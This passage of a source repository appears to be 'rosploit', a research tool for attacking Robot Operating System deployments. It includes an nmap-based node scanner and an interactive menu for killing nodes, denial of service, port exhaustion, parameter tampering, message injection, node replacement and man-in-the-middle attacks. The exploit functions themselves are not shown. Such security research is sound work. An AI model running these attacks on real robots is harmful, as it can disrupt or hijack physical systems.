152 | return {"ROS slave node.", "Master URL: " .. masterid}
153 |
154 | -- print(master_response.body)
155 | -- print(slave_response.body)
156 | elseif master_response and not slave_response then
157 | return "ROS Master node"
158 | -- print(master_response.body)
159 | --TODO: What publisher node?
160 | elseif publisher_response then
161 | local filter_pub_name = "(/.*)"
162 | local filtered_response = publisher_response.body:match(filter_pub_name)
163 | return "ROS Publisher node"
164 | --return "ROS Publisher node" .. '\n' .. filtered_response
165 | end
166 | -- This is either a TCPROS system or not a ros system
167 | else
168 | local response=tcpros(host,port)
169 | if not response then
170 | return ""
171 | end
172 | return response
173 | end
174 |
175 | end
176 |
--------------------------------------------------------------------------------
/recon/scan_node.py:
--------------------------------------------------------------------------------
1 | import os
2 | from typing import List
3 |
4 | import nmap
5 |
6 | # from demo import demo
7 | from core.node import Node
8 |
9 | # TODO: THIS IS BAD. JUST HERE TO MAKE IT WORK
10 | # NMAP_DATA_DIR = os.path.join(demo.root_path, "..", "rosploit_recon")
11 |
12 |
13 | # NMAP_DATA_DIR = demo.root_path + "\\\\"+".." + "\\\\" + "rosploit_recon"
14 | NMAP_DATA_DIR = os.path.dirname(os.path.realpath(__file__))
15 |
16 |
17 | def scan_host(ip_addr: str, port_range: str, script_list: List[str]) -> List[Node]:
18 | """
19 | Scan all of the ROS nodes for a given ip address and port range. Wraps nmap
20 | :param ip_addr: IP address to scan
21 | :param port_range: Port range to scan over
22 | :param script_list: List of NSE scripts to execute.
23 | :return:
24 | """
25 | nm = nmap.PortScanner()
26 | print("Starting scan ip addr " + ip_addr + " ports " + port_range)
27 | DATA_DIR = NMAP_DATA_DIR.replace("\\", '\\\\')
28 | scripts = ""
29 | new_list = [os.path.join(DATA_DIR, s) for s in script_list]
30 | scripts = ",".join(new_list)
31 |
32 | try:
33 | nm.scan(hosts=ip_addr, ports=port_range, arguments='-sV --script=' + scripts)
34 | except Exception as inst:
35 | print("Exception type " + str(type(inst)))
36 | print("Failed to scan node because " + str(inst))
37 | raise inst
38 | print(nm.command_line())
39 | print(nm.scaninfo())
40 | print(nm.all_hosts())
41 |
42 | try:
43 | if 'up' not in nm[ip_addr].state():
44 | print(nm[ip_addr].state())
45 | print("IP addr not up " + ip_addr)
46 | raise Exception('Node Down')
47 | elif 'tcp' not in nm[ip_addr].all_protocols():
48 | print("No open tcp ports in " + port_range)
49 | raise Exception("No TCP ports")
50 | except Exception as inst:
51 | print("Exception type " + str(type(inst)))
52 | print("Failed to check node info because " + str(inst))
53 | raise inst
54 | # print(nm[ip_addr].state())
55 | # print(nm[ip_addr].all_protocols())
56 | node_list = []
57 | lport = sorted(nm[ip_addr]['tcp'].keys())
58 | # print(lport)
59 | for port in lport:
60 | # TODO: Just the ROS ports
61 | # print(port)
62 | try:
63 | # print(nm[ip_addr]['tcp'][port])
64 | # print(nm[ip_addr]['tcp'][port]['extrainfo'])
65 | notes = nm[ip_addr]['tcp'][port]['extrainfo'] + ' '
66 | if 'script' in nm[ip_addr]['tcp'][port] and 'ros-node-id' in nm[ip_addr]['tcp'][port]['script']:
67 | if nm[ip_addr]['tcp'][port]['script']['ros-node-id'] and not "ERROR:" in \
68 | nm[ip_addr]['tcp'][port]['script'][
69 | 'ros-node-id']:
70 | for key, value in nm[ip_addr]['tcp'][port]['script'].items():
71 | notes = notes + key + ":" + value + "\n"
72 | temp_node = Node(ip_addr=str(ip_addr), port=str(port), notes=notes)
73 | node_list.append(temp_node)
74 | # print(temp_node.notes)
75 | except Exception as inst:
76 | print("Node Creation Exception")
77 | raise inst
78 | return node_list
79 |
80 |
81 | if __name__ == "__main__":
82 | results = scan_host('127.0.0.1', '1-', ['ros-master-scan.nse', 'ros-node-id.nse'])
83 | for node in results:
84 | print(node.port)
85 | print(node.notes)
86 | if "Publisher" in node.notes:
87 | node.get_pub_list("/id")
88 | node.get_sub_list("/id")
89 | for pub in node.pub_topics:
90 | print(pub.name)
91 | print(pub.md5_sum)
92 | for sub in node.sub_topics:
93 | print(sub.name)
94 | print(sub.md5_sum)
95 |
--------------------------------------------------------------------------------
/requirements.txt:
--------------------------------------------------------------------------------
1 | netifaces
2 | genpy
3 | python-nmap==0.6.1
4 | resource
--------------------------------------------------------------------------------
/rosploit.py:
--------------------------------------------------------------------------------
1 | import signal
2 | import sys
3 | from typing import List
4 |
5 | import exploit
6 | import recon
7 | from core import Node, Message, Topic
8 |
9 | node_list = []
10 | topic_list = []
11 | node_name = "/rosploit"
12 |
13 |
14 | def signal_handler(sig, frame):
15 | print('Caught signal Exiting')
16 | sys.exit(0)
17 |
18 |
19 | def print_options():
20 | print("Welcome to rosploit")
21 | print("Enter a number to activate that option")
22 | print("0) Exit")
23 | print("1) Run a scan of the system ")
24 | print("2) Display current detected rosgraph")
25 | print("3) Kill a node")
26 | print("4) Run a DOS against a selected host")
27 | print("5) Exhaust all open ports on a selected host")
28 | print("6) List all the parameters on the parameter server")
29 | print("7) Change a parameter on the parameter server")
30 | print("8) Inject data onto a given topic")
31 | print("9) Replace a node with a copy under your control")
32 | print("10) Perform a Man in the Middle(MITM) attack against two nodes over a topic ")
33 |
34 |
35 | def leave():
36 | save = int(input("Would you like to save your results? (1 for yes)"))
37 | if save == 1:
38 | print("TODO")
39 | sys.exit(0)
40 |
41 |
42 | def scan_system():
43 | node_list: List[Node] = recon.scan_host('127.0.0.1', '1-', ['ros-master-scan.nse', 'ros-node-id.nse'])
44 | for node in node_list:
45 | node.get_pub_list(node_name)
46 | node.get_sub_list(node_name)
47 | node.get_name(node_name)
48 | if "Master" in node.notes:
49 | topic_list = Topic.from_master(node.server.getPublishedTopics(node_name, ""))
50 |
51 |
52 | def print_graph():
53 | # TODO: Prettier graph
54 | for node in node_list:
55 | print(node)
56 | for topic in topic_list:
57 | print(topic)
58 |
59 |
60 | def kill_node():
61 | target_name = input("Enter the name of the node you want to kill")
62 | for node in node_list:
63 | if node.name == target_name:
64 | exploit.kill_node(node, node_name=node_name)
65 | return
66 | print("Failed to find node to kill")
67 |
68 |
69 | def dos():
70 | target_name = input("Enter the name of the node you want to dos")
71 | for node in node_list:
72 | if node.name == target_name:
73 | exploit.dos(node)
74 | return
75 | print("Failed to find node to dos")
76 |
77 |
78 | def port_exhaust():
79 | target_name = input("Enter the name of the node you want to exhaust the ports of")
80 | for node in node_list:
81 | if node.name == target_name:
82 | exploit.port_exhaust(target_node=node, node_name=node_name)
83 | return
84 | print("Failed to find node to dos")
85 |
86 |
87 | def list_param():
88 | for node in node_list:
89 | if "Master" in node.notes:
90 | exploit.list_parameters(node, node_name)
91 | return
92 | print("Failed to find the parameter server")
93 |
94 |
95 | def change_param():
96 | target_param = input("Enter the name of the param you want to change")
97 | target_value = input("Enter the new value of the param")
98 | for node in node_list:
99 | if "Master" in node.notes:
100 | exploit.change_parameter(node, node_name, target_param, target_value)
101 | return
102 | print("Failed to find the parameter server")
103 |
104 |
105 | def message_inject():
106 | target_topic = input("Enter the name of the topic you want to inject")
107 | target_node = input("Enter the name of the node you want to inject to")
108 | target_message = input("Enter the message you want to inject (json)")
109 | for node in node_list:
110 | if node.name == target_node:
111 | for topic in topic_list:
112 | if topic.name == target_topic:
113 | exploit.message_injection(target_node=node, target_topic=topic, node_name=node_name,
114 | message=Message.from_json(target_message))
115 | print("Failed to find the topic to inject")
116 |
117 |
118 | def replace_node():
119 | target_node = input("Enter the name of the node you want to replace")
120 | # TODO: Consider more parameters
121 | for node in node_list:
122 | if node.name == target_node:
123 | exploit.replace_node(target_node=node, node_name=node_name)
124 | print("Failed to replace the node")
125 |
126 |
127 | def mitm_dummy(message: Message, topic: Topic):
128 | """
129 | Generic dummy function for the mitm. Just sends each message twice
130 | :param message: The last received message from the publisher
131 | :param topic: the topic
132 | :return:
133 | """
134 | topic.publish(message)
135 | topic.publish(message)
136 |
137 |
138 | def mitm():
139 | # Currently the demo function just doubles messages
140 | target_node1 = input("Enter the name of the first node you want to attack for the mitm")
141 | target_node2 = input("Enter the name of the second node you want to attack for the mitm")
142 | topic_name = input("Enter the name of the topic you want to attack for the mitm")
143 | t1 = None
144 | t2 = None
145 | target_topic = None
146 | for node in node_list:
147 | if node.name == target_node2:
148 | t2 = node
149 | if node.name == target_node1:
150 | t1 = node
151 | if t1 and t2:
152 | for topic in topic_list:
153 | if topic.name == topic_name:
154 | target_topic = topic
155 | exploit.mitm(node1=t1, node2=t2, topic=target_topic, node_name=node_name, interface_func=mitm_dummy)
156 | return
157 |
158 | print("Failed to find both nodes or topic")
159 |
160 |
161 | def rosploit():
162 | signal.signal(signal.SIGINT, signal_handler)
163 | function_list = [exit, scan_system, print_graph, kill_node, dos, port_exhaust, list_param, change_param,
164 | message_inject,
165 | replace_node,
166 | mitm]
167 | while True:
168 | print_options()
169 | option = int(input("Select option:"))
170 | if option > len(function_list):
171 | print(option)
172 | print("Invalid Option")
173 | else:
174 | function_list[option]()
175 |
176 |
177 | if __name__ == "__main__":
178 | rosploit()
179 |
--------------------------------------------------------------------------------
/setup.py:
--------------------------------------------------------------------------------
1 | from distutils.core import setup
2 |
3 | setup(name='rosploit',
4 | version='1.0',
5 | packages=['core', 'exploit', 'recon'],
6 | author='Sean Rivera',
7 | author_email='sean.rivera@uni.lu',
8 | url='https://github.com/seanrivera/rosploit'
9 | )
10 |
--------------------------------------------------------------------------------
/test/test_TCPROS.py:
--------------------------------------------------------------------------------
1 | from unittest import TestCase
2 |
3 | # TODO: Import names are screwy
4 | from core.tcpros import TCPROS
5 |
6 |
7 | class TestTCPROS(TestCase):
8 | def test_subscriber(self):
9 | self.fail()
10 |
11 | def test_publisher(self):
12 | message_definition = "string data"
13 | caller_id = "rostopic_4767_1316912741557"
14 | latching = "1"
15 | md5sum = "992ce8a1687cec8c8bd883ec73ca41d1"
16 | topic = "/chatter"
17 | message_type = "std_msgs/String"
18 | data = "hello"
19 | test_sub = TCPROS.publisher(message_definition=message_definition, caller_id=caller_id, topic=topic,
20 | md5sum=md5sum,
21 | latching=latching, message_type=message_type, data=data, port=0,
22 | ip_addr="localhost")
23 | test_sub.create_header()
24 | print(test_sub.items.items())
25 | print(test_sub.header)
26 | print([hex(i) for i in test_sub.header])
27 |
28 | def test_client(self):
29 | self.fail()
30 |
31 | def test_service(self):
32 | self.fail()
33 |
--------------------------------------------------------------------------------
/test/test_rosploit.py:
--------------------------------------------------------------------------------
1 | from unittest import TestCase
2 |
3 | # TODO: Import names are screwy
4 | import rosploit
5 |
6 |
7 | class TestRosploit(TestCase):
8 | def test_scan_node(self):
9 | original_input = __builtins__.input
10 | __builtins__.raw_input = lambda _: '1'
11 | self.assertIsNotNone(rosploit.rosploit())
12 | __builtins__.raw_input = original_input
13 |
--------------------------------------------------------------------------------